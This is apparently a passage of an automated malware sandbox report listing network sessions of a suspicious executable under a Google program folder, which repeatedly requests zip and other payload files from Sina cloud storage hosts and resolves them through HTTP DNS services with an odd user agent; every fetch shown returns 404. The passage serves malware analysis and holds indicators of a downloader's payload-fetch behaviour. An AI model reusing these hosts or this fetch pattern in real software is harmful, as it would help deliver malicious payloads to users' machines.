Data Raw: 64 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 73 36 70 61 69 65 73 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 36 37 31 61 39 62 66 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 33 36 2d 33 38 36 38 64 64 35 63 64 31 63 38 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
Data Ascii: d9<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/s6paies</Resource> <RequestId>7671a9bf-2412-0521-2636-3868dd5cd1c8</RequestId></Error>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.2.5 | 49936 | 183.60.95.221 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 14:26:36.582461119 CET | 241 | OUT | GET /question/o6saettr.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Host: sinastorage.cn
Range: bytes=0-
Connection: Keep-Alive
Dec 5, 2024 14:26:38.138217926 CET | 532 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.6.0 r22061420-1acaf9b
Date: Thu, 05 Dec 2024 13:26:37 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: keep-alive
X-Requester: GRPS000000ANONYMOUSE
X-RequestId: 7662ae9d-2412-0521-2637-28dee5e81b8d
x-error-code: NoSuchBucket
Data Raw: 64 65 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 6f 36 73 61 65 74 74 72 2e 7a 69 70 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 36 36 32 61 65 39 64 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 33 37 2d 32 38 64 65 65 35 65 38 31 62 38 64 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
Data Ascii: de<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/o6saettr.zip</Resource> <RequestId>7662ae9d-2412-0521-2637-28dee5e81b8d</RequestId></Error>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
61 | 192.168.2.5 | 49942 | 114.114.114.114 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 14:26:38.270463943 CET | 83 | OUT | GET /d?dn=sinastorage.cn HTTP/1.1
User-Agent: A2F0jleks
Host: 114.114.114.114


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
62 | 192.168.2.5 | 49943 | 182.254.116.116 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 14:26:38.270967007 CET | 83 | OUT | GET /d?dn=sinastorage.cn HTTP/1.1
User-Agent: A2F0jleks
Host: 182.254.116.116
Dec 5, 2024 14:26:39.844280005 CET | 114 | IN | HTTP/1.1 200 OK
Connection: close
Server: Http Server
Content-Type: text/html
Content-Length: 10
Data Raw: 34 39 2e 37 2e 33 37 2e 39 37
Data Ascii: 49.7.37.97


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
63 | 192.168.2.5 | 49944 | 119.29.29.29 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 14:26:38.271783113 CET | 80 | OUT | GET /d?dn=sinastorage.cn HTTP/1.1
User-Agent: A2F0jleks
Host: 119.29.29.29
Dec 5, 2024 14:26:39.492655039 CET | 114 | IN | HTTP/1.1 200 OK
Connection: close
Server: Http Server
Content-Type: text/html
Content-Length: 10
Data Raw: 34 39 2e 37 2e 33 37 2e 39 37
Data Ascii: 49.7.37.97


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
64 | 192.168.2.5 | 49948 | 49.7.37.97 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 14:26:39.638016939 CET | 241 | OUT | GET /question/o6saettr.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Host: sinastorage.cn
Range: bytes=0-
Connection: Keep-Alive
Dec 5, 2024 14:26:41.209420919 CET | 532 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.6.0 r22061420-1acaf9b
Date: Thu, 05 Dec 2024 13:26:40 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: keep-alive
X-Requester: GRPS000000ANONYMOUSE
X-RequestId: 5a8f2d5c-2412-0521-2640-6c92bfce66fe
x-error-code: NoSuchBucket
Data Raw: 64 65 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 6f 36 73 61 65 74 74 72 2e 7a 69 70 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 35 61 38 66 32 64 35 63 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 34 30 2d 36 63 39 32 62 66 63 65 36 36 66 65 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
Data Ascii: de<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/o6saettr.zip</Resource> <RequestId>5a8f2d5c-2412-0521-2640-6c92bfce66fe</RequestId></Error>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
65 | 192.168.2.5 | 49950 | 27.221.16.149 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 14:26:41.337794065 CET | 240 | OUT | GET /question/o6saettr.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Host: sinacloud.net
Range: bytes=0-
Connection: Keep-Alive
Dec 5, 2024 14:26:43.119719982 CET | 508 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 05 Dec 2024 13:26:33 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: keep-alive
X-Requester: GRPS000000ANONYMOUSE
X-RequestId: 3566a6f7-2412-0521-2642-6c92bfce68e1
x-error-code: NoSuchBucket
Data Raw: 64 65 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 6f 36 73 61 65 74 74 72 2e 7a 69 70 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 35 36 36 61 36 66 37 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 34 32 2d 36 63 39 32 62 66 63 65 36 38 65 31 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
Data Ascii: de<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/o6saettr.zip</Resource> <RequestId>3566a6f7-2412-0521-2642-6c92bfce68e1</RequestId></Error>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
66 | 192.168.2.5 | 49956 | 27.221.16.179 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 14:26:43.251868963 CET | 240 | OUT | GET /question/o6saettr.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Host: sinacloud.net
Range: bytes=0-
Connection: Keep-Alive
Dec 5, 2024 14:26:45.080378056 CET | 508 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 05 Dec 2024 13:26:42 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: keep-alive
X-Requester: GRPS000000ANONYMOUSE
X-RequestId: 76c330cc-2412-0521-2644-58c7acc909bc
x-error-code: NoSuchBucket
Data Raw: 64 65 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 6f 36 73 61 65 74 74 72 2e 7a 69 70 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 36 63 33 33 30 63 63 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 34 34 2d 35 38 63 37 61 63 63 39 30 39 62 63 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
Data Ascii: de<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/o6saettr.zip</Resource> <RequestId>76c330cc-2412-0521-2644-58c7acc909bc</RequestId></Error>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
67 | 192.168.2.5 | 49961 | 119.29.29.29 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 14:26:45.287086010 CET | 79 | OUT | GET /d?dn=sinacloud.net HTTP/1.1
User-Agent: A2F0jleks
Host: 119.29.29.29
Dec 5, 2024 14:26:46.521205902 CET | 131 | IN | HTTP/1.1 200 OK
Connection: close
Server: Http Server
Content-Type: text/html
Content-Length: 27
Data Raw: 32 37 2e 32 32 31 2e 31 36 2e 31 34 39 3b 32 37 2e 32 32 31 2e 31 36 2e 31 37 39
Data Ascii: 27.221.16.149;27.221.16.179


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
68 | 192.168.2.5 | 49962 | 182.254.116.116 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 14:26:45.287271976 CET | 82 | OUT | GET /d?dn=sinacloud.net HTTP/1.1
User-Agent: A2F0jleks
Host: 182.254.116.116
Dec 5, 2024 14:26:46.864692926 CET | 131 | IN | HTTP/1.1 200 OK
Connection: close
Server: Http Server
Content-Type: text/html
Content-Length: 27
Data Raw: 32 37 2e 32 32 31 2e 31 36 2e 31 37 39 3b 32 37 2e 32 32 31 2e 31 36 2e 31 34 39
Data Ascii: 27.221.16.179;27.221.16.149


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
69 | 192.168.2.5 | 49967 | 27.221.16.149 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 14:26:46.647070885 CET | 240 | OUT | GET /question/o6saettr.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Host: sinacloud.net
Range: bytes=0-
Connection: Keep-Alive
Dec 5, 2024 14:26:48.421031952 CET | 508 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 05 Dec 2024 13:26:39 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: keep-alive
X-Requester: GRPS000000ANONYMOUSE
X-RequestId: 3305a745-2412-0521-2647-b4055d752a45
x-error-code: NoSuchBucket
Data Raw: 64 65 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 6f 36 73 61 65 74 74 72 2e 7a 69 70 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 33 30 35 61 37 34 35 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 34 37 2d 62 34 30 35 35 64 37 35 32 61 34 35 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
Data Ascii: de<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/o6saettr.zip</Resource> <RequestId>3305a745-2412-0521-2647-b4055d752a45</RequestId></Error>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
70 | 192.168.2.5 | 49973 | 27.221.16.179 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 14:26:48.547483921 CET | 240 | OUT | GET /question/o6saettr.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Host: sinacloud.net
Range: bytes=0-
Connection: Keep-Alive
Dec 5, 2024 14:26:50.305517912 CET | 508 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 05 Dec 2024 13:26:47 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: keep-alive
X-Requester: GRPS000000ANONYMOUSE
X-RequestId: 54beaca1-2412-0521-2650-b4055d7078f2
x-error-code: NoSuchBucket
Data Raw: 64 65 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 6f 36 73 61 65 74 74 72 2e 7a 69 70 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 35 34 62 65 61 63 61 31 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 35 30 2d 62 34 30 35 35 64 37 30 37 38 66 32 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
Data Ascii: de<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/o6saettr.zip</Resource> <RequestId>54beaca1-2412-0521-2650-b4055d7078f2</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                71192.168.2.549979123.126.45.208805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:26:50.957849979 CET242OUTGET /question/o6saettr.zip HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.com
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:26:52.510710001 CET | 532 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22061420-1acaf9b
                                                                                Date: Thu, 05 Dec 2024 13:26:52 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 3529120e-2412-0521-2652-6c92bfce66d4
                                                                                x-error-code: NoSuchBucket
                                                                                Data Ascii: de<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/o6saettr.zip</Resource> <RequestId>3529120e-2412-0521-2652-6c92bfce66d4</RequestId></Error>0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                72 | 192.168.2.5 | 49985 | 119.29.29.29 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 5, 2024 14:26:52.640202045 CET | 81 | OUT | GET /d?dn=sinastorage.com HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 119.29.29.29
                                                                                Dec 5, 2024 14:26:54.369816065 CET | 117 | IN | HTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 13
                                                                                Data Raw: 31 38 33 2e 36 30 2e 39 35 2e 32 32 31
                                                                                Data Ascii: 183.60.95.221


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                73 | 192.168.2.5 | 49986 | 182.254.116.116 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 5, 2024 14:26:52.641159058 CET | 84 | OUT | GET /d?dn=sinastorage.com HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 182.254.116.116
                                                                                Dec 5, 2024 14:26:55.637254000 CET | 117 | IN | HTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 13
                                                                                Data Raw: 31 38 33 2e 36 30 2e 39 35 2e 32 32 31
                                                                                Data Ascii: 183.60.95.221


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                74 | 192.168.2.5 | 49987 | 114.114.114.114 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 5, 2024 14:26:53.152030945 CET | 82 | OUT | GET /d?dn=sinacloud.net HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 114.114.114.114


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                75 | 192.168.2.5 | 49989 | 183.60.95.221 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 5, 2024 14:26:54.494318962 CET | 242 | OUT | GET /question/o6saettr.zip HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.com
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:26:56.056746006 CET | 532 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22061420-1acaf9b
                                                                                Date: Thu, 05 Dec 2024 13:26:55 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 769b74c6-2412-0521-2655-5ca7213e02f2
                                                                                x-error-code: NoSuchBucket
                                                                                Data Ascii: de<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/o6saettr.zip</Resource> <RequestId>769b74c6-2412-0521-2655-5ca7213e02f2</RequestId></Error>0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                76 | 192.168.2.5 | 49995 | 183.60.95.221 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 5, 2024 14:26:56.596960068 CET | 237 | OUT | GET /question/c6tmassa HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.cn
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:26:58.148675919 CET | 528 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22061420-1acaf9b
                                                                                Date: Thu, 05 Dec 2024 13:26:57 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 76c540ba-2412-0521-2657-b4055d71257c
                                                                                x-error-code: NoSuchBucket
                                                                                Data Ascii: da<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/c6tmassa</Resource> <RequestId>76c540ba-2412-0521-2657-b4055d71257c</RequestId></Error>0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                77 | 192.168.2.5 | 50001 | 182.254.116.116 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 5, 2024 14:26:58.286137104 CET | 83 | OUT | GET /d?dn=sinastorage.cn HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 182.254.116.116
                                                                                Dec 5, 2024 14:26:59.906419039 CET | 114 | IN | HTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 10
                                                                                Data Raw: 34 39 2e 37 2e 33 37 2e 39 37
                                                                                Data Ascii: 49.7.37.97


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                78 | 192.168.2.5 | 50002 | 119.29.29.29 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 5, 2024 14:26:58.290731907 CET | 80 | OUT | GET /d?dn=sinastorage.cn HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 119.29.29.29
                                                                                Dec 5, 2024 14:26:59.513760090 CET | 114 | IN | HTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 10
                                                                                Data Raw: 34 39 2e 37 2e 33 37 2e 39 37
                                                                                Data Ascii: 49.7.37.97


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                79 | 192.168.2.5 | 50007 | 49.7.37.97 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 5, 2024 14:26:59.698271036 CET | 237 | OUT | GET /question/c6tmassa HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.cn
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:27:04.225837946 CET | 528 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22061420-1acaf9b
                                                                                Date: Thu, 05 Dec 2024 13:27:03 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 3566ca88-2412-0521-2703-6c92bfce68e1
                                                                                x-error-code: NoSuchBucket
                                                                                Data Ascii: da<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/c6tmassa</Resource> <RequestId>3566ca88-2412-0521-2703-6c92bfce68e1</RequestId></Error>0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                80 | 192.168.2.5 | 50009 | 114.114.114.114 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 5, 2024 14:27:00.271812916 CET | 84 | OUT | GET /d?dn=sinastorage.com HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 114.114.114.114


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                81 | 192.168.2.5 | 50014 | 114.114.114.114 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 5, 2024 14:27:01.517812014 CET | 83 | OUT | GET /d?dn=sinastorage.cn HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 114.114.114.114


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                82 | 192.168.2.5 | 50020 | 123.126.45.208 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 5, 2024 14:27:04.351999998 CET | 238 | OUT | GET /question/c6tmassa HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.com
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:27:05.929930925 CET | 528 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22061420-1acaf9b
                                                                                Date: Thu, 05 Dec 2024 13:27:05 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 32a9dc93-2412-0521-2705-b4055d752a1d
                                                                                x-error-code: NoSuchBucket
                                                                                Data Ascii: da<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/c6tmassa</Resource> <RequestId>32a9dc93-2412-0521-2705-b4055d752a1d</RequestId></Error>0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
